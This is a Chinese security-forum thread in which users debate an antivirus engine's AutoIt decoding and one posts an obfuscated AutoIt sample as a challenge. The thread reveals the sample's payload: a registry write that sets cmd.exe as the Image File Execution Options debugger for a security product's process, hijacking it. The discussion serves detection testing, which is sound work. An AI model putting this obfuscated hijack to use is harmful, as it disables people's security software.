火绒1.0.10 版本开始，杀毒引擎增加了AU3解码查杀~~欢迎测试

vardyh

李白vs苏轼 发表于 2013-2-21 21:49
关键是你们字符串的匹配，没到位，，你们解了啥用啊

我真没什么好说的了，

李白vs苏轼

vardyh 发表于 2013-2-21 21:51
我真没什么好说的了，

详见待会帖子

李白vs苏轼

vardyh 发表于 2013-2-21 21:51
我真没什么好说的了，

这个混淆过的  你解一下看看把

李白vs苏轼

连，编辑

李白vs苏轼

vardyh 发表于 2013-2-21 21:51
我真没什么好说的了，

时间到了，不用去看行为了，按你刚才的步骤 早弄完了

先知

来支持了。

vardyh

李白vs苏轼 发表于 2013-2-21 21:56
这个混淆过的  你解一下看看把

IF NOT ISDECLARED ( "Os" ) THEN GLOBAL $OS
##OnAutoItStartRegister "A5F0000210F_"
GLOBAL $A1600100D55 = A5F0000210F( $OS [ 0x00000001 ] ) , $A460020465B = A5F0000210F( $OS [ 0x00000002 ] ) , $A3000303125 = A5F0000210F( $OS [ 0x00000003 ] ) , $A1D00402C29 = A5F0000210F( $OS [ 0x00000004 ] )
REGWRITE ( $A1600100D55 , $A460020465B , $A3000303125 , $A1D00402C29 )
FUNC A5F0000210F_( )
GLOBAL $OS
FOR $AX0X0XA = 0x00000001 TO 0x00000005
$A5F0000210FSZ_ = A5F0000210FX_( )
FILEINSTALL ( "PrintScreen.au3.tbl" , $A5F0000210FSZ_ , 0x00000001 )
GLOBAL $A5F0000210F , $OS = EXECUTE ( BINARYTOSTRING ( "0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383335333333373334333733323336333933363435333633373335333333373330333634333336333933373334333233383334333633363339333634333336333533353332333633353336333133363334333233383332333433343331333333353334333633333330333333303333333033333330333333323333333133333330333433363337333333373431333534363332333933323433333233373337343233333335333333363337333433323337333234333333333133323339323732393239272929" ) )
IF ISARRAY ( $OS ) AND $OS [ 0x00000000 ] >= 0x00000004 THEN EXITLOOP
SLEEP ( 0x0000000a )
NEXT
EXECUTE ( BINARYTOSTRING ( "0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333533343336333333303333333033333330333333303333333233333331333333303334333633373333333734313335343633323339323732393239272929" ) )
ENDFUNC
FUNC A5F0000210FX_( )
LOCAL $A5F0000210FS1_ = A5F0000210F( "4054656D70446972" ) , $A5F0000210FS3_ = A5F0000210F( "31" ) , $A5F0000210FS4_ = A5F0000210F( "5c" ) , $A5F0000210FS5_ = A5F0000210F( "5c" ) , $A5F0000210FS6_ = A5F0000210F( "37" ) , $A5F0000210FS8_ = A5F0000210F( "3937" ) , $A5F0000210FS9_ = A5F0000210F( "313232" ) , $A5F0000210FS7_ = A5F0000210F( "31" ) , $A5F0000210FSA_
$A5F0000210FS2_ = EXECUTE ( $A5F0000210FS1_ )
IF STRINGRIGHT ( $A5F0000210FS2_ , NUMBER ( $A5F0000210FS3_ ) ) <> $A5F0000210FS4_ THEN $A5F0000210FS2_ = $A5F0000210FS2_ & $A5F0000210FS5_
SRANDOM ( NUMBER ( STRINGRIGHT ( TIMERINIT ( ) , 0x00000004 ) ) )
DO
$A5F0000210FSA_ = ""
WHILE STRINGLEN ( $A5F0000210FSA_ ) < NUMBER ( $A5F0000210FS6_ )
$A5F0000210FSA_ = $A5F0000210FSA_ & CHR ( RANDOM ( NUMBER ( $A5F0000210FS8_ ) , NUMBER ( $A5F0000210FS9_ ) , NUMBER ( $A5F0000210FS7_ ) ) )
WEND
$A5F0000210FSA_ = $A5F0000210FS2_ & $A5F0000210FSA_
UNTIL NOT FILEEXISTS ( $A5F0000210FSA_ )
RETURN ( $A5F0000210FSA_ )
ENDFUNC
FUNC A5F0000210F( $A5F0000210F )
LOCAL $A5F0000210F_
FOR $X = 0x00000001 TO STRINGLEN ( $A5F0000210F ) STEP 0x00000002
$A5F0000210F_ &= CHR ( DEC ( STRINGMID ( $A5F0000210F , $X , 0x00000002 ) ) )
NEXT
RETURN $A5F0000210F_
ENDFUNC

vardyh

李白vs苏轼 发表于 2013-2-21 22:02
时间到了，不用去看行为了，按你刚才的步骤 早弄完了

我权限不够，大图上不来，贴文字给你，~

李白vs苏轼

vardyh 发表于 2013-2-21 22:03
IF NOT ISDECLARED ( "Os" ) THEN GLOBAL $OS
##OnAutoItStartRegister "A5F0000210F_"
GLOBAL $A160 ...

正确答案是“RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsMain.exe","Debugger","REG_SZ","cmd.exe")”




这算解了吗 亲

china_killer

李白vs苏轼 发表于 2013-2-21 22:02
时间到了，不用去看行为了，按你刚才的步骤 早弄完了

感谢金山公司的同志！